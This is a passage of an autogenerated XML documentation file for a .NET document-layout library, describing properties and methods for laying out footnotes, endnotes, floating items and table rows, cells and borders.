            <summary>
            Gets the First Item in the line 
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.WrappingDifference">
            <summary>
            Get or set the wrapping difference.
            </summary>
            <value>The widget container.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.MaxRightPositionOfTabStopInterSectingFloattingItems">
            <summary>
            Gets or sets the maximum right position of tab stop inter secting floatting items.
            </summary>
            <value>
            The maximum right position of tab stop inter secting floatting items.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.RightPositionOfTabStopInterSectingFloattingItems">
            <summary>
            Gets or sets the right position of tab stop interSect floatting items.
            </summary>
            <value>
            The right position of tab stop inter floatting items.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.TOCLevels">
            <summary>
            Gets the TOC levels.
            </summary>
            <value>The TOC levels.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.TOCEntryPageNumbers">
            <summary>
            Gets the toc entry page numbers.
            </summary>
            <value>
            The toc entry page numbers.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.tocParaItems">
            <summary>
            Gets the TOC link styles instance
            </summary>
            <value>The TOC link style instance</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.UpdatingPageFields">
            <summary>
            Gets a value indicating whether updating Page fields.
            </summary>
            <value><c>true</c> if updating Page fields; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FootnoteWidgets">
            <summary>
            Gets the Footnote widgets.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.EndnoteWidgets">
            <summary>
            Gets the Endnote widgets.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.BehindWidgets">
            <summary>
            Gets the Endnote widgets.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.NumberOfBehindWidgetsInHeader">
            <summary>
            Gets the number of behind widgets in header.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.NumberOfBehindWidgetsInFooter">
            <summary>
            Gets the number of behind widgets in footer.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.EndNoteSectionIndex">
            <summary>
            Gets the Endnote section index.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.CurrentSection">
            <summary>
            Gets the current section.
            </summary>
            <value>
            The current section.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FootNoteSectionIndex">
            <summary>
            Gets the Footnote section index.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FootnoteSplittedWidgets">
            <summary>
            Get the Splitted Footnote widgets
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.EndnoteSplittedWidgets">
            <summary>
            Get or set the Splitted Endnote widgets
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.EndnotesInstances">
            <summary>
            Get or set the Endnote instances
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.FloatingItems">
            <summary>
            Gets the wrapping entity collection.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.DynamicParagraph">
            <summary>
            Gets or sets the dynamic paragraph.
            </summary>
            <value>
            The dynamic paragraph.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.DynamicTable">
            <summary>
            Gets or sets the dynamic table.
            </summary>
            <value>
            The dynamic table.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.MaintainltWidget">
            <summary>
            Gets the wrapping entity collection.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.m_interSectingPoint">
            <summary>
            Gets the wrapping entity collection.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.PageEndWidget">
            <summary>
            Gets the page end widget.
            </summary>
            <value>
            The page end widget.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.PreviousTab">
            <summary>
            Gets or sets the previous tab.
            </summary>
            <value>The previous tab.</value>
        </member>
        <member name="P:Syncfusion.Layouting.Layouter.PreviousTabWidth">
            <summary>
            Gets or sets the width of the previous tab.
            </summary>
            <value>The width of the previous tab.</value>
        </member>
        <member name="T:Syncfusion.Layouting.Layouter.LeafLayoutEventHandler">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.FloatingItem">
            <summary>
            Class to hold the floating items. 
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.FloatingItem.SortFloatingItems(System.Collections.Generic.List{Syncfusion.Layouting.FloatingItem},Syncfusion.Layouting.SortPosition)">
            <summary>
            Sorts the specified floating items.
            </summary>
            <param name="floatingItems">The floating items.</param>
            <param name="sortPosition">The sort list based on.</param>
        </member>
        <member name="M:Syncfusion.Layouting.FloatingItem.IsNeedTobeChangeSortedItem(Syncfusion.Layouting.SortPosition,System.Drawing.RectangleF,System.Drawing.RectangleF)">
            <summary>
            Determines whether the sorted item need to be changed or not.
            </summary>
            <param name="SortPosition">The sort list based on.</param>
            <param name="firstItem">The first item.</param>
            <param name="secondItem">The secon item.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.TextWrappingBounds">
            <summary>
            Get or Set the wrapping bounds.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.FloatingEntity">
            <summary>
            Get or Set the wrapping element instances.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.TextWrappingStyle">
            <summary>
            Gets wrapping style.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.TextWrappingType">
            <summary>
            Gets wrapping type
            </summary>
            <value></value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.FloatingItem.OwnerParagraph" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.FloatingItem.AllowOverlap" -->
        <member name="P:Syncfusion.Layouting.FloatingItem.WrapCollectionIndex">
            <summary>
            Gets or sets the index of the wrap collection.
            </summary>
            <value>
            The index of the wrap collection.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.IsFloatingItemFit">
            <summary>
            Gets or sets a value indicating whether this instance is floating item fit.
            </summary>
            <value>
            <c>true</c> if this instance is floating item fit; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.FloatingItem.IsDoesNotDenotesRectangle">
            <summary>
            Gets or sets a value indicating whether the instance is added.
            </summary>
            <value>
              <c>true</c> if  the instance is added; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.Layouting.FieldLayoutInfo">
            <summary>
            Summary description for FieldLayoutInfo.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.FieldLayoutInfo.m_fieldType">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.FieldLayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutFieldInfo"/> class.
            </summary>
            <param name="childLayoutDirection">if set to <c>true</c> [b top subtract area].</param>
        </member>
        <member name="P:Syncfusion.Layouting.FieldLayoutInfo.FieldType">
            <summary>
            Gets or sets the type of the field.
            </summary>
            <value>The type of the field.</value>
        </member>
        <member name="P:Syncfusion.Layouting.HtmlToDocLayoutInfo.RemoveLineBreak">
            <summary>
            Gets/Sets boolean value to indicate whether line break need to be removed if it is last item in a paragraph
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TableLayoutInfo">
            <summary>
            Summary description for TableLayoutInfo.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TableLayoutInfo.m_table">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TableLayoutInfo.m_paddings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TableLayoutInfo.m_margins">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.TableLayoutInfo.#ctor(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.Layouting.TableLayoutInfo.GetHeadersRowCount">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.Width">
            <summary>
            Gets / sets table width
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.Height">
            <summary>
            Gets table height
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.CellsWidth">
            <summary>
            Gets / sets cells width array
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.HeadersRowCount">
            <summary>
            Gets / sets count of headers rows
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.IsDefaultCells">
            <summary>
            Gets the bool values array determining if cells are default
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.IsSplittedTable">
            <summary>
            Gets or sets a value indicating whether this table is splitted table
            </summary>
            <value>
            <c>true</c> If this table is splitted into next page; otherwise, <c>false</c>>
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.HeaderRowHeight">
            <summary>
            Gets or sets the height of the header row.
            </summary>
            <value>
            The height of the header row.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.IsHeaderRowHeightUpdated">
            <summary>
            Gets or sets a value indicating whether this instance is header row height updated.
            </summary>
            <value>
            <c>true</c> if this instance is header row height updated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.CellSpacings">
            <summary>
            Gets owner table cell spacings.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TableLayoutInfo.CellPaddings">
            <summary>
            Gets owner cell paddings.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.RowLayoutInfo">
            <summary>
            Summary description for RowLayoutInfo.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.RowLayoutInfo.#ctor(System.Boolean,System.Single)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutTableInfo"/> class.
            </summary>
            <param name="isExactlyRow">if set to <c>true</c> [is exactly row].</param>
            <param name="rowHeight">Height of the row.</param>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsFootnoteReduced">
            <summary>
            Gets and sets IsFootnoteReduced
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsFootnoteSplitted">
            <summary>
            Gets and sets IsFootnoteSplitted
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsExactlyRowHeight">
            <summary>
            Gets or sets a value indicating whether this instance is exactly row height.
            </summary>
            <value>
            	<c>true</c> if this instance is exactly row height; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowSplitted">
            <summary>
            Gets or sets a value indicating whether this instance is row splitted.
            </summary>
            <value>
            	<c>true</c> if this instance is row splitted; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.RowHeight">
            <summary>
            Gets or sets the height of the row.
            </summary>
            <value>The height of the row.</value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowHasVerticalMergeContinueCell">
            <summary>
            Gets or sets a value indicating whether this instance is row has vertically merge continue cell.
            </summary>
            <value>
            <c>true</c> if this instance is row has vertically merge continue cell; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowHasVerticalMergeEndCell">
            <summary>
            Gets or sets a value indicating whether this instance is row has vertically merge continue end cell.
            </summary>
            <value>
            <c>true</c> if this instance is row has vertically merge continue end cell; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowHasVerticalMergeStartCell">
            <summary>
            Gets or sets a value indicating whether this instance is row has vertically merge start cell.
            </summary>
            <value>
            <c>true</c> if this instance is row has vertically merge start cell; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowHasVerticalTextCell">
            <summary>
            Gets or sets a value indicating whether this instance is row has vertical text cell.
            </summary>
            <value>
            <c>true</c> if this instance is row has vertical text cell; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowBreakByPageBreakBefore">
            <summary>
            Gets or Sets a value inidcating whether this row is splitted by pagebreak before property inside the first item of cell
            </summary>
            <value>
            <c>true</c> if this row is splitted by page break before property ; otherwise,<c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.IsRowHeightExceedsClientByFloatingItem">
            <summary>
            Gets or sets a value indicating whether header row repeat or not
            </summary>
            <value>
            <c>true</c> If header row not repeat by floating items present in table; otherwise, <c>false</c>>
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.RowLayoutInfo.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="T:Syncfusion.Layouting.CellLayoutInfo">
            <summary>
            Summary description for CellLayoutInfo.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.#ctor(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutTableInfo"/> class.
            </summary>
            <param name="childLayoutDirection">The child layout direction.</param>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.InitMerges">
            <summary>
            Determines the formats.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.IsCellVerticallyMerged(System.Single,System.Single,System.Int32,System.Boolean,System.Boolean)">
            <summary>
            Checks the cell is vertically merged.
            </summary>
            <param name="cellStartPos">The cell start position.</param>
            <param name="cellWidth">Width of the cell.</param>
            <param name="adjRowIndex">Index of the adj row.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.InitSpacings">
            <summary>
            Update the cell's border, padding, margins
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.IsSkipBorder(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,System.Boolean)">
            <summary>
            Determines whether [is skip border] [the specified value1].
            </summary>
            <param name="value1">The value1.</param>
            <param name="value2">The value2.</param>
            <param name="isFirstRead">if set to <c>true</c> [is first read].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.GetLeftHalfWidth(System.Int32)">
            <summary>
            Gets the Left HalfWidth.
            </summary>
            <param name="cellIndex">The cellIndex.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.GetRightHalfWidth(System.Int32,System.Int32)">
            <summary>
            Gets the Right HalfWidth.
            </summary>
            <param name="cellIndex">The cellIndex.</param>
            <param name="cellLast">The cellLast.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.GetBottomHalfWidth(System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Gets the Bottom HalfWidth.
            </summary>
            <param name="cellIndex">The cellIndex.</param>
            <param name="cellLast">The cellLast.</param>
            <param name="rowIndex">The rowIndex.</param>
            <param name="rowLast">The rowLast.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.GetTopHalfWidth(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTableCell,System.Int32)">
            <summary>
            Gets the Top HalfWidth.
            </summary>
            <param name="cellIndex">The cellIndex.</param>
            <param name="rowIndex">The rowIndex.</param>
            <param name="m_cell">The Cell widget</param>
            <param name="previousRowIndex">Previous row index depends on splitted table</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.GetAdjacentRowCell(System.Single,System.Single,System.Int32)">
            <summary>
            Gets the adjacent row cell.
            Returns the horizontal merge start cell for merged cells.
            </summary>
            <param name="rowIndex">Index of the row.</param>
            <returns>Returns the adjacent row cell, ie., top and bottom cell</returns>
        </member>
        <member name="M:Syncfusion.Layouting.CellLayoutInfo.InitLayoutInfo">
            <summary>
            Initilizes the layoutinfo values as null
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsColumnMergeStart">
            <summary>
            Gets a value indicating whether this instance is column merge start.
            </summary>
            <value>
            	<c>true</c> if this instance is column merge start; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsColumnMergeContinue">
            <summary>
            Gets a value indicating whether this instance is column merge continue.
            </summary>
            <value>
            	<c>true</c> if this instance is column merge continue; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsRowMergeStart">
            <summary>
            Gets a value indicating whether this instance is row merge start.
            </summary>
            <value>
            	<c>true</c> if this instance is row merge start; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsRowMergeContinue">
            <summary>
            Gets a value indicating whether this instance is row merge continue.
            </summary>
            <value>
            	<c>true</c> if this instance is row merge continue; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsRowMergeEnd">
            <summary>
            Gets or sets a value indicating whether this instance is row merge end.
            </summary>
            <value>
            <c>true</c> if this instance is row merge end; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.VerticalAlignment">
            <summary>
            Gets the vertical alignment.
            </summary>
            <value>The vertical alignment.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellContentLayoutingBounds">
            <summary>
            Gets or sets the width of the cell content layouting.
            </summary>
            <value>
            The width of the cell content layouting.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.SkipTopBorder">
            <summary>
            Gets or sets a value indicating whether to skip top border.
            </summary>
            <value><c>true</c> if skip top border; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.SkipBottomBorder">
            <summary>
            Gets or sets a value indicating whether to skip bottom border.
            </summary>
            <value><c>true</c> if skip bottom border; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.SkipLeftBorder">
            <summary>
            Gets or sets a value indicating whether to skip left border.
            </summary>
            <value><c>true</c> if skip left border; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.SkipRightBorder">
            <summary>
            Gets or sets a value indicating whether to skip right border.
            </summary>
            <value><c>true</c> if skip right border; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.TopPadding">
            <summary>
            Gets or sets the top padding.
            </summary>
            <value>
            The top padding.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.UpdatedTopPadding">
            <summary>
            Gets or sets the new top padding.
            </summary>
            <value>
            The new top padding.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.BottomPadding">
            <summary>
            Gets or sets the bottom padding.
            </summary>
            <value>
            The bottom padding.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.TopBorder">
            <summary>
            Gets or sets the top border.
            </summary>
            <value>
            The top border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.BottomBorder">
            <summary>
            Gets or sets the bottom border.
            </summary>
            <value>
            The bottom border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.LeftBorder">
            <summary>
            Gets or sets the left border.
            </summary>
            <value>
            The left border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.RightBorder">
            <summary>
            Gets or sets the right border.
            </summary>
            <value>
            The right border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.UpdatedTopBorders">
            <summary>
            Gets the updated top borders.
            </summary>
            <value>
            The updated top borders.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.PrevCellTopBorder">
            <summary>
            Gets the previous cell top border.
            </summary>
            <value>
            The previous cell top border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.NextCellTopBorder">
            <summary>
            Gets the next cell top border.
            </summary>
            <value>
            The next cell top border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.PrevCellBottomBorder">
            <summary>
            Gets or sets the previous cell bottom border.
            </summary>
            <value>
            The previous cell bottom border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.NextCellBottomBorder">
            <summary>
            Gets or sets the next cell bottom border.
            </summary>
            <value>
            The next cell bottom border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsCellHasEndNote">
            <summary>
            Gets or sets a value indicating whether this instance is cell has end note.
            </summary>
            <value>
            <c>true</c> if this instance is cell has end note; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.IsCellHasFootNote">
            <summary>
            Gets or sets a value indicating whether this instance is cell has foot note.
            </summary>
            <value>
            <c>true</c> if this instance is cell has foot note; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellBorder.BorderType">
            <summary>
            Gets the type of the border.
            </summary>
            <value>
            The type of the border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellBorder.BorderColor">
            <summary>
            Gets the color of the border.
            </summary>
            <value>
            The color of the border.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellBorder.RenderingLineWidth">
            <summary>
            Gets the width of the border line.
            </summary>
            <value>
            The width of the border line.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellBorder.BorderLineWidth">
            <summary>
            Gets the width of the border line.
            </summary>
            <value>
            The width of the border line.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.CellLayoutInfo.CellBorder.AdjCellLeftBorder">
            <summary>
            Gets or sets the adj cell left border.
            </summary>
            <value>
            The adj cell left border.
            </value>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutContext">
            <summary>
            Summary description for LayoutContext.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.DEF_MIN_WIDTH_SQUARE">
            <summary>
            The minimum width for required for text to fit after the square type floating item.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.DEF_MIN_WIDTH_2013_TIGHTANDTHROW">
            <summary>
            The minimum width for required for text to fit after the Tight and throw type floating item in Word 2013.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.DEF_MIN_WIDTH_TIGHTANDTHROW">
            <summary>
            The minimum width for required for text to fit after the Tight and Throw type floating item.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.MAX_WIDTH">
            <summary>
            The maximum width.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.BottomOverlapDifferenceForTightAndThroughWrappingStyle">
            <summary>
            The bottom overlap difference for tight and through wrapping style.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_ltState">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_sptWidget">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_notFittedWidget">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_widget">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_ltWidget">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_bSkipAreaSpacing">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_layoutArea">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_lcOperator">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutContext.m_clientLayoutAreaRight">
            <summary>
            Right margin of client layout area
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.#ctor(Syncfusion.Layouting.IWidget,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutContext"/> class.
            </summary>
            <param name="widget">The widget.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.Layout(System.Drawing.RectangleF)">
            <summary>
            Layouts the specified widget.
            </summary>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsEnsureSplitted">
            <summary>
            Determines whether ensure splitted.
            </summary>
            <returns>
            <c>true</c> if ensure splitted; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.DoLayoutAfter">
            <summary>
            Does the layout after.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LayoutFootnote(Syncfusion.DocIO.DLS.WFootnote,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Layout Footnote
            </summary>
            <param name="footnote"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LayoutEndnote(Syncfusion.DocIO.DLS.WFootnote,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Layout Endnote
            </summary>
            <param name="endnote"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LayoutFootnoteTextBody(Syncfusion.Layouting.IWidgetContainer,System.Single@,System.Single)">
            <summary>Check Weather footnote is splitted and return the boolean value.
            Layout Footnote TextBody
            </summary>
            <param name="widgetContainer"></param>
            <param name="height"></param>
            <param name="clientHeight"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsFootnoteSplitted(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Check Weather footnote is splitted and return the boolean value.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LayoutEndnoteTextBody(Syncfusion.Layouting.IWidgetContainer,System.Single@,System.Single)">
            <summary>
            Layout Endnote TextBody
            </summary>
            <param name="widgetContainer"></param>
            <param name="height"></param>
            <param name="clientHeight"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.AddLayoutWidgetInBeforeInsectingPoint(Syncfusion.Layouting.LayoutedWidget,System.Int32)">
            <summary>
            Adds the layout widget in before insecting point.
            </summary>
            <param name="interSectWidget">The inter sect widget.</param>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateFootnoteWidgets(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Update footnote widgets
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.UpdateFootnoteWidgets(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Update footnote widgets
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.CreateLayoutArea(System.Drawing.RectangleF)">
            <summary>
            Creates the layout area.
            </summary>
            <param name="rect">The Rectangle.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.LayoutTextWrapWidgets(Syncfusion.Layouting.IWidget)">
             <summary>
            layout the bounds for wrapping element in paragraph collection
             </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.IsDoNotSuppressIndent(Syncfusion.DocIO.DLS.WParagraph,System.Single,System.Single,System.Int32)">
            <summary>
            Check whether �doNotSuppressIndentation� property is set and skip the indent for the paragraph and its not applicable for Word 2013
            </summary>
            <param name="paragraph"></param>
            <param name="yPosition"></param>
            <param name="wrappingBoundsBottom"></param>
            <param name="floatingItemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetSDTOwnerTextBody(Syncfusion.DocIO.DLS.SDTBlockContent)">
            <summary>
            Return the owner of the StructureDocumentTagBlock.
            </summary>
            <param name="sdtBlockContent"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.ResetFloatingEntityProperty(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Resets the floating entity property.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetParagraphTopMargin(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Get paragraph top margin
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.GetTextRange(Syncfusion.Layouting.IWidget)">
            <summary>
            Get the Text Range
            </summary>
            <param name="?"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutContext.AdjustboundsBasedOnWrapPolygon(System.Drawing.RectangleF,System.Collections.Generic.List{System.Drawing.PointF},System.Single,System.Single,System.Boolean@)">
            <summary>
            Adjust bounds the based on wrap polygon.
            </summary>
